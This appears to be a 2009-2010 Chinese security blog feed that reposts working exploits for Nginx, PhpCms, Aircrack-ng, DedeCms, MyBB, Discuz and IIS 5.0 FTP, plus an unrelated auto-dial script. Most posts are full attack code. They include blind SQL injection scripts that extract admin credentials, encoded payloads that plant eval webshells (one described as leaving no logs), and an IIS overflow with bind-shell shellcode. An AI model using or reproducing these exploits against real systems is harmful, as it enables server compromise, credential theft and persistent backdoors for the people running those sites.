Chinadu`s Blog » 矩阵毒刺

Nginx 0.8.35 Space Character Remote Source Disclosure

Chinadu — Mon, 31 May 2010 01:34:31 +0000

#################################################################
# Application Info:
# Name: Nginx
# Tested on nginx 0.8.35
# Nginx 0.8.36 and higher is not vulnerable
#################################################################
# Vulnerability Info:
# Type: Remote File Disclosure
# Risk: High
#################################################################
# Vulnerability:
# http://localhost/file.php%20
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: whh_iran[at]securitylab.ir & info@securitylab[dot]ir
###################################################################

PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

Chinadu — Sat, 08 May 2010 12:56:27 +0000

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." ".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 1:

$query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 2:

$query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 3:

$query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

$time_a = time();

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

$time_b = time();

fclose($conn);

//echo $time_b - $time_a."\r\n";

if ($time_b - $time_a > 4)

return true;

else

return false;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 0;

$chr = 0;

while ($exit==0)

{

if (exploit($hostname, $path, $pos, $chr, $chs))

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path)

{

echo "[+] prefix: ";

$conn = fsockopen($hostname, 80);

$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";

$request .= "Host: {$hostname}\r\n";

$request .= "Connection: Close\r\n\r\n";

fputs($conn, $request);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

preg_match('/FROM `(.+)yp_product/ie',$reply,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("Exploit failed");

}

?>

PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)

Chinadu — Sat, 08 May 2010 12:55:25 +0000

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." ".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 0:

$query = "#";

break;

case 1:

$query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 2:

$query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 3:

$query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

//print_r($conn);

/*if (!$conn){

exit("\r\n[-] No response from $conn");

}*/

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

return $reply;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 1;

$chr = 0;

while ($exit==0)

{

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match ("/(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path, $chs)

{

echo "[+] prefix: ";

$pos = 0;

$chr = 0;

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match('/FROM `(.+)yp_product/ie',$response,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path, 0);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("\r\n[-] Exploit failed");

}

?>

Remote Exploit Against the Aircrack-NG Tools svn r1675

Chinadu — Thu, 15 Apr 2010 02:53:33 +0000

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

The tools' code responsible for parsing IEEE802.11-packets assumes the

self-proclaimed length of a EAPOL-packet to be correct and never to exceed

a (arbitrary) maximum size of 256 bytes for packets that are part of the

EAPOL-authentication. We can exploit this by letting the code parse packets

which:

a) proclaim to be larger than they really are, possibly causing the code

to read from invalid memory locations while copying the packet;

b) really do exceed the maximum size allowed and overflow data structures

allocated on the heap, overwriting libc's allocation-related

structures. This causes heap-corruption.

Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-

path. Careful layout of the packet's content can even possibly alter the

instruction-flow through the already well known heap-corruption paths

in libc. Playing with the proclaimed length of the EAPOL-packet and the

size and content of the packet's padding immediately end up in various

assertion errors during calls to free(). This reveals the possibility to

gain control over $EIP.

Given that we have plenty of room for payload and that the tools are

usually executed with root-privileges, we should be able to have a

single-packet-own-everything exploit at our hands. As the attacker can

cause the various tools to do memory-allocations at his will (through

faking the appearance of previously unknown clients), the resulting

exploit-code should have a high probability of success.

The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev

r238 to work. It generates pcap-file with single packet of the following

content:

0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0

108000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172

3F

03/27/2010, Lukas Lueg, lukas.lueg@gmail.com

'''

import cpyrit.pckttools

import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second

# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-

# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and

# struct WPA_hdsk.

# We have plenty of room for exploit-payload as most of the fields in the

# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent

# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in

# case of airodump-ng...

pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \

addr2='00:de:ad:c0:de:01', \

FCfield='to-DS') \

/ scapy.layers.dot11.LLC() \

/ scapy.layers.dot11.SNAP() \

/ scapy.layers.l2.EAPOL(len=65000) \

/ cpyrit.pckttools.EAPOL_Key() \

/ cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \

/ scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':

print "Packet's content:"

print ''.join("%02X" % ord(c) for c in str(pckt))

filename = 'aircrackng_exploit.cap'

print "Writing to '%s'" % filename

writer = cpyrit.pckttools.Dot11PacketWriter(filename)

writer.write(pckt)

writer.close()

print 'Done'

DedeCms v5.5 0day

Chinadu — Wed, 10 Mar 2010 01:53:34 +0000

官方暂时没出补丁,不过我估计快了
执行成功会在在data/cache下生成t.php一句话小马
密码t,官方最新GBK和utf-8版本存在此漏洞,
此exp得特点是生产t.php得时候不留日志

print_r('

+----------------------------------------+

dedecms v5.5 final getwebshell exploit

+----------------------------------------+

');

if ($argc < 3) {

print_r('

+----------------------------------------+

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to dedecms

Example:

php '.$argv[0].' localhost /dedecms/

+----------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$post_a = 'plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97)

.chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104)

.chr(101).chr(47).chr(116).chr(46).chr(112).chr(104)

.chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)

.chr(104).chr(112).chr(32).chr(101).chr(118).chr(97)

.chr(108).chr(40).chr(36).chr(95).chr(80).chr(79)

.chr(83).chr(84).chr(91).chr(39).chr(116).chr(39)

.chr(93).chr(41).chr(59).chr(63).chr(62));/*';

$post_b = 'needCode=aa/../../../data/mysql_error_trace';

$shell = 'data/cache/t.php';

get_send($post_a);

post_send('plus/comments_frame.php',$post_b);

$content = post_send($shell,'t=echo tojen;');

if(substr($content,9,3)=='200'){

echo "\nShell Address is:".$host.$path.$shell;

}else{

echo "\nError.";

}

function get_send($url){

global $host, $path;

$message = "GET ".$path."$url HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Connection: Close\r\n\r\n";

$fp = fsockopen($host, 80);

if(!$fp){

echo "\nConnect to host Error";

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

function post_send($url,$cmd){

global $host, $path;

$message = "POST ".$path."$url HTTP/1.1\r\n";

$message .= "Accept: */*\r\n";

$message .= "Referer: http://$host$path\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $host\r\n";

$message .= "Content-Length: ".strlen($cmd)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

$fp = fsockopen($host, 80);

if(!$fp){

echo "\nConnect to host Error";

}

fputs($fp, $message);

$back = '';

while (!feof($fp))

$back .= fread($fp, 1024);

fclose($fp);

return $back;

}

?>

MyBB 1.4 admin remote code execution vulnerability

Chinadu — Mon, 18 Jan 2010 11:50:13 +0000

by flyh4t
team: http://www.80vul.com
date: 2010-01-10

测试版本MyBB 1.44.11

[一]漏洞分析

在index.php文件336行左右代码如下：

//index.php,336行左右

$plugins->run_hooks("index_end");
//出现了eval函数，注意参数
eval("$index = "".$templates->get("index")."";");
output_page($index);

看以下eval()函数中的内容是否可以控制，继续找到templates类查看get函数的定义:

//inc/class_templates.php,65行左右

function get($title, $eslashes=1, $htmlcomments=1)
{
global $db, $theme, $mybb;

//
// DEVELOPMENT MODE
//
if($mybb->dev_mode == 1)
{
$template = $this->dev_get($title);
if($template !== false)
{
$this->cache[$title] = $template;
}
}

if(!isset($this->cache[$title]))
{
$query = $db->simple_select("templates", "template", "title='".$db->escape_string($title)."' AND sid IN ('-2','-1','".$theme['templateset']."')", array('order_by' => 'sid', 'order_dir' => 'DESC', 'limit' => 1));
//从数据库里面的取出模版的代码
$gettemplate = $db->fetch_array($query);
if($mybb->debug_mode)
{
$this->uncached_templates[$title] = $title;
}

if(!$gettemplate)
{
$gettemplate['template'] = "";
}

$this->cache[$title] = $gettemplate['template'];
}
$template = $this->cache[$title];

if($htmlcomments)
{
if($mybb->settings['tplhtmlcomments'] == 1)
{
$template = "n{$template}n";
}
else
{
$template = "n{$template}n";
}
}

if($eslashes)
{
$template = str_replace("'", "'", addslashes($template));
}
return $template;
}

从上面的代码可以看出，get()函数是从数据库里面取出模板的内容经过处理后返回给eval函数。继续来跟以下，
看看数据库里面的数据是如何来的:

//admin/modules/style/templates.php,372行开始

if($mybb->input['action'] == "edit_template")
{
$plugins->run_hooks("admin_style_templates_edit_template");

if(!$mybb->input['title'] || !$sid)
{
flash_message($lang->error_missing_input, 'error');
admin_redirect("index.php?module=style/templates");
}

if($mybb->request_method == "post")
{
if(empty($mybb->input['title']))
{
$errors[] = $lang->error_missing_title;
}

if(!$errors)
{
$query = $db->simple_select("templates", "*", "tid='{$mybb->input['tid']}'");
$template = $db->fetch_array($query);
//获取到我们输入的内容，包括模板的标题和内容
$template_array = array(
'title' => $db->escape_string($mybb->input['title']),
'sid' => $sid,
'template' => $db->escape_string(trim($mybb->input['template'])),
'version' => $mybb->version_code,
'status' => '',
'dateline' => TIME_NOW
);

// Make sure we have the correct tid associated with this template. If the user double submits then the tid could originally be the master template tid, but because the form is sumbitted again, the tid doesn't get updated to the new modified template one. This then causes the master template to be overwritten
$query = $db->simple_select("templates", "tid", "title='".$db->escape_string($template['title'])."' AND (sid = '-2' OR sid = '{$template['sid']}')", array('order_by' => 'sid', 'order_dir' => 'desc', 'limit' => 1));
$template['tid'] = $db->fetch_field($query, "tid");

if($sid > 0)
{
// Check to see if it's never been edited before (i.e. master) of if this a new template (i.e. we've renamed it) or if it's a custom template
$query = $db->simple_select("templates", "sid", "title='".$db->escape_string($mybb->input['title'])."' AND (sid = '-2' OR sid = '{$sid}' OR sid='{$template['sid']}')", array('order_by' => 'sid', 'order_dir' => 'desc'));
$existing_sid = $db->fetch_field($query, "sid");
$existing_rows = $db->num_rows($query);
//更新模版数据库
if(($existing_sid == -2 && $existing_rows == 1) || $existing_rows == 0)
{
$tid = $db->insert_query("templates", $template_array);
}
else
{
$db->update_query("templates", $template_array, "tid='{$template['tid']}' AND sid != '-2'");
}
}

从以上的代码可以发现，这是一个典型的“二次”漏洞.我们在后台将php代码通过编辑模板注入到数据库，然后到访问前台文件取出代码进入eval函数成功执行代码，注入代码的时候要规避一些敏感符号。比较遗憾的是这个漏洞需要管理员权限才能利用，仅能作为后台getwebshell的方法。

[二]漏洞利用：

在后台 Home -> Template Sets -> Default Templates 选择Edit Template: index
在{$headerinclude}下写入如下一段代码后保存:

{${assert(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).
chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).
chr(39).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).
chr(102).chr(108).chr(121).chr(104).chr(52).chr(116).
chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).
chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).
chr(60).chr(63).chr(112).chr(104).chr(112).
chr(32).chr(64).chr(36).chr(95).chr(80).chr(79)
.chr(83).chr(84).chr(91).chr(119).chr(93).chr(40)
.chr(36).chr(95).chr(80).chr(79).chr(83).chr(84)
.chr(91).chr(102).chr(93).chr(41).chr(63).
chr(62).chr(39).chr(41).chr(59))}}

访问首页后将在cache目录下生成flyh4t.php，内容为，可以使用客户端连接。

No Related Post

discuz!7.1、7.2远程代码执行漏洞exploit

Chinadu — Thu, 07 Jan 2010 08:49:19 +0000

1.注册一个新用户
2.Exp代码如下：

帖子ID，指定一个存在的帖子即可：

chr解码后是：

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'');

保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁：

http://www.discuz.net/thread-1537673-1-1.html

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit 中英文通用版

Chinadu — Sun, 20 Sep 2009 13:29:38 +0000

绑定4444端口，Windows 2000 CN + SP4 测试通过，需要能建目录的用户，偏移地址若不通用，请自行修改。

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
"\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
"\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
"\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
"\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
"\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

$shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
"\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
"\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
"\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
"\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
"\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
"\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
"\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
"\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
"\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
"\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
"\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
"\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
"\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
"\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
"\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
"\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
"\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
"\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
"\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
"\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
"\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
"\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
"\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
"\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";

print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl \n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');

# 自行修改以下两个地址以增强通用性, 此俩地址在我机器上测试成功
$patch = "\x7e\xd1\xf9\x7f";
$retaddr = "\x9B\xB1\xF4\x77";

# 你可以使用wordexp的这两个跳转地址
#$patch = "\x90\x80\xb7\x6f";
#$retaddr = "\xcd\x60\xb6\x6f";

# 这里也修改了, 多加了两个"K", 因为$myfindsc中
# 用了"repne scasd[edi]"指令来查找Shellcode, 多
# 加两个"K"使其四字节对齐, 否则会找不到（通用性？）
$v = "KKKSEXY" . $sc . "V" x (500-length($sc)-5);

# 溢出时堆栈的基本状况
# |0 |104 | 108 |112 |164 |168 |172 |176
#$c = "A" x 104 . $patch . $patch. "A" x 52 . $patch . "AAAA". $retaddr .$patch."Aa4Aa5Aa6Aa7Aa8Aa9Ab";

#
#void myfindsc()
#{
# __asm
# {
# int 3;
#start:
# MOV EDX,ESP;
# FCMOVNBE ST,ST(2);
# _emit 0xd9;
# _emit 0x72;
# _emit 0xf4; FSTENV [edx-0Ch]
# POP EBP;
# PUSH EBP;
# POP EBX;
# PUSH 76h;
# POP EAX;
#xorsc:
# XOR BYTE PTR DS:[EBX+28h],AL; patch "decode" 的0xff
#findsc:
# MOV EAX,66666666h;
# SUB EAX,66566666h;
# PUSH EAX;
# POP EDI;
# PUSH 21212121h;
# POP ECX;
# MOV EAX,59584553h;
# REPNE SCAS DWORD PTR ES:[EDI];
#decode:
# _emit 0x89;
# _emit 0xE7; JMP EDI
# }
#}
#
#
#void main()
#{
# myfindsc();
#}
#

# 修改用于定位Shellcode的代码, 由于该代码需要调
# 用call或者jmp等指令以跳转到Shellcode的地方, 此
# 类指令包含了0xff, 会被IIS过滤, 所以这里采用了自
# 修改的形式将0xff patch掉. 本来想要alpha2加密,
# 但是加密后内容太长.
$myfindsc =
"\x8b\xd4\xdb\xd2\xd9\x72\xf4\x5d\x55\x5b\x6a\x76\x58".
"\x30\x43\x27\xb8\x66\x66\x66\x66\x2d\x66\x66\x5F\x66".
"\x50\x5f\x68\x21\x21\x21\x21\x59\xb8\x53\x45\x58\x59".
"\xf2\xaf\x89\xe7";

$c = $myfindsc . "A" x (104 - length($myfindsc)) .
$patch . $patch. "\xEB\x8E\x44\x44"."A" x 48 .
# |< -- 第二次跳转: 到这里后最终跳到$myfindsc
$patch . "AAAA". $retaddr . $patch . "A" x 16 ."\xE2\xAA"."NN";
# |<-- 第一次跳转: 函数返回以后经过跳转来到这里, 但是$myfindsc太远, 就又跳了一次

$x = <$sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = < $sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = < $sock>;
print $x;
print $sock "USER anonimoos\r\n";
$x = < $sock>;
print $x;
print $sock "PASS $shell\r\n";
$x = < $sock>;
print $x;

print $sock "USER anonymous\r\n";
$x = < $sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = < $sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = < $sock>;
print $x;
print $sock "MKD CCCC". "$c\r\n"; # 这里也被修改了, 多加了个C, 用于4字节对齐
$x = < $sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = < $sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = < $sock>;
print $x;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(< $new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit

Chinadu — Fri, 04 Sep 2009 15:32:00 +0000

#!/usr/bin/env python
#
# *** Acrobat Reader - Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#

http://www.coromputer.net/CVE-2009-0927_package.zip

back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

# milw0rm.com [2009-09-03]

让 Windows 开机自动拨号上网

Chinadu — Fri, 04 Sep 2009 15:30:15 +0000

1. 将以下代码复制、粘贴到记事本
2. 把代码中的“宽带连接”修改为你建立的的拨号网络连接的名称，账号、密码分别修改为你的 ADSL 账号和密码
3. 将代码另存为：拨号.vbs，此时双击即可实现拨号
4. 把“拨号.vbs” 拖到开始菜单的启动项里
5. 完成。

CreateObject("WScript.Shell").run"Rasdial 宽带连接账号密码",0

Chinadu`s Blog » 矩阵毒刺

Nginx 0.8.35 Space Character Remote Source Disclosure

相关文章

PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)

相关文章

PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)

相关文章

Remote Exploit Against the Aircrack-NG Tools svn r1675

相关文章

DedeCms v5.5 0day

